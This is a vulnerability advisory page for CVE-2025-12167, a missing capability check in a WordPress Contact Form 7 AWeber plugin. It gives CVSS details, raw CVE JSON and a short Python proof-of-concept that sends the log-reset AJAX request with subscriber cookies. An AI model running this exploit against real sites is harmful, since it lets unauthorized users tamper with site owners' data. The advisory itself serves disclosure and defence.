Security Vulnerability Report
中文
CVE-2025-12167 CVSS 4.3 MEDIUM

CVE-2025-12167

Published: 2025-11-08 04:15:45
Last Modified: 2026-04-15 00:35:42

Description

The Contact Form 7 AWeber Extension plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_aweber_logreset' AJAX endpoint in all versions up to, and including, 0.1.42. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset the AWeber logs.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Contact Form 7 AWeber Extension <= 0.1.42 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-12167 PoC - Unauthorized AWeber Log Reset # Target: WordPress site with Contact Form 7 AWeber Extension <= 0.1.42 # Authentication required: Subscriber-level or higher target_url = "http://target-wordpress-site.com" wp_admin_ajax = f"{target_url}/wp-admin/admin-ajax.php" # Authenticated session with Subscriber-level access cookies = { "wordpress_test_cookie": "WP+Cookie+check", "wordpress_logged_in_[hash]": "subscriber_session_cookie" } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } # Exploit: Trigger the vulnerable AJAX endpoint to reset AWeber logs payload = { "action": "aweber_logreset" } print("[*] Sending request to reset AWeber logs...") print(f"[*] Target: {wp_admin_ajax}") print(f"[*] Payload: action=aweber_logreset") try: response = requests.post( wp_admin_ajax, data=payload, cookies=cookies, headers=headers, timeout=10 ) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body: {response.text[:500]}") if response.status_code == 200: print("[+] Request completed - AWeber logs may have been reset") else: print("[-] Request failed") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12167", "sourceIdentifier": "[email protected]", "published": "2025-11-08T04:15:44.857", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Contact Form 7 AWeber Extension plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_aweber_logreset' AJAX endpoint in all versions up to, and including, 0.1.42. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset the AWeber logs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3390662%40integrate-contact-form-7-and-aweber&new=3390662%40integrate-contact-form-7-and-aweber&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0f4ecda0-1eaa-44e7-8ef5-20c967b5da9f?source=cve", "source": "[email protected]"}]}}